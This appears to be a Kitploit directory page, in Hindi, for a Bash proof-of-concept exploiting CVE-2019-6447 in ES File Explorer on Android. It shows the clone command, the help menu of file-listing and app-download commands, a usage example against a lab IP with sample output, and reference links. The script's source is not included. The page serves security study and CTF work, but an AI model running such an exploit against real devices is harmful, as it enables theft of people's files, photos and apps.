Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-ES-File-Explorer-CVE-2019-6447 — ES File Explorer में CVE-2019-6447 का शोषण करने वाली Bash PoC स्क्रिप्ट जो कमजोर Android उपकरणों से फ़ाइलें, फ़ोटो, वीडियो, ऐप्स सूचीबद्ध करती है और फ़ाइलें डाउनलोड करती है। | Kitploit
उपकरण/GitHubGitHub/julio-cfa/poc-es-file-explorer-cve-2019-6447
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणशोषणडेटा निष्कासनजानकारी एकत्र करनामोबाइल सुरक्षा
GitHubjulio-cfa/poc-es-file-explorer-cve-2019-6447

POC-ES-File-Explorer-CVE-2019-6447

ES File Explorer में CVE-2019-6447 का शोषण करने वाली Bash PoC स्क्रिप्ट जो कमजोर Android उपकरणों से फ़ाइलें, फ़ोटो, वीडियो, ऐप्स सूचीबद्ध करती है और फ़ाइलें डाउनलोड करती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
34 साल पहलेअभी तक समीक्षित नहीं

PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

यह CVE-2019-6447 का bash में एक बहुत ही सरल कार्यान्वयन है। यह मूल रूप से सही पैरामीटर के साथ अनुरोध भेजने के लिए curl का उपयोग करता है। मैंने इसे इसलिए बनाया क्योंकि मैं एक CTF के दौरान एक समान स्क्रिप्ट ढूंढ रहा था और कोई नहीं मिली। आप मूल स्क्रिप्ट के साथ खेल सकते हैं और इसे अपनी पसंद के अनुसार अनुकूलित कर सकते हैं।

स्थापना:

बस रिपॉजिटरी को क्लोन करें और .sh फ़ाइल का उपयोग करें।

root@kitploit:~
git clone [email protected]:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git

या रॉ कंटेंट को कॉपी करके एक फ़ाइल में पेस्ट करें।

उपयोग:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

उदाहरण:

root@kitploit:~
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]

संदर्भ:

यदि आप उत्सुक हैं कि यह एक्सप्लॉइट पर्दे के पीछे कैसे काम करता है या यदि यह विफल होता है और आपको अपनी स्क्रिप्ट बनानी पड़ती है, तो आप निम्नलिखित लिंक पढ़ सकते हैं:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

टूल डाउनलोड करें